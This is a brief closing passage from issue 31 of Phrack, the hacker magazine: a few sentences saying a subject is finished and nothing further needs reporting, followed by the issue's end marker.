There you go. It's over now, forget it and move on. Nothing more to
report on the subject that hasn't been printed, typed, spoken, or heard in the
last couple of months.
_______________________________________________________________________________
Phrack 31 - .end
--------------------------------------------------------------------------------